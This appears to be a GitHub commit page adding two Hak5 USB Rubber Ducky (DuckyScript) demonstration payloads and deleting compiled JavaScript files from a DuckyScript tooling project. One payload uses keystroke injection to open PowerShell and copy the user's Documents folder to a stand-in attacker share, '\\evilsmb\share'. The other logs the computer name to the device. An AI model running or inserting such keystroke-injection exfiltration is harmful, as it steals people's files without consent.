Skip to content

Commit d4e6028

Browse files
committed
New assets for a future version
1 parent 65d2548 commit d4e6028

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

53 files changed

+102
-2851
lines changed
Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
2+
REM_BLOCK
3+
Credits: Hak5
4+
Website: https://docs.hak5.org/
5+
Source: https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-tm-quick-reference#exfiltration
6+
7+
This piece of code is for demonstration purposes only; it needs to be adjusted.
8+
END_REM
9+
10+
11+
ATTACKMODE HID
12+
DELAY 2000
13+
GUI r
14+
DELAY 100
15+
STRINGLN powershell "cp -r $env:USERPROFILE\Documents\* \\evilsmb\share"
Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
2+
REM_BLOCK
3+
Credits: Hak5
4+
Website: https://docs.hak5.org/
5+
Source: https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-tm-quick-reference#exfiltration
6+
7+
This piece of code is for demonstration purposes only; it needs to be adjusted.
8+
END_REM
9+
10+
11+
ATTACKMODE HID STORAGE
12+
DELAY 2000
13+
GUI r
14+
DELAY 100
15+
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
16+
STRINGLN echo $env:computername >> $m:\computer_names.txt"
17+

out/commands/attackmode.js

Lines changed: 0 additions & 88 deletions
This file was deleted.

out/commands/attackmode.js.map

Lines changed: 0 additions & 1 deletion
This file was deleted.

out/commands/basic_modifier.js

Lines changed: 0 additions & 112 deletions
This file was deleted.

out/commands/basic_modifier.js.map

Lines changed: 0 additions & 1 deletion
This file was deleted.

out/commands/button.js

Lines changed: 0 additions & 81 deletions
This file was deleted.

out/commands/button.js.map

Lines changed: 0 additions & 1 deletion
This file was deleted.

0 commit comments

Comments
 (0)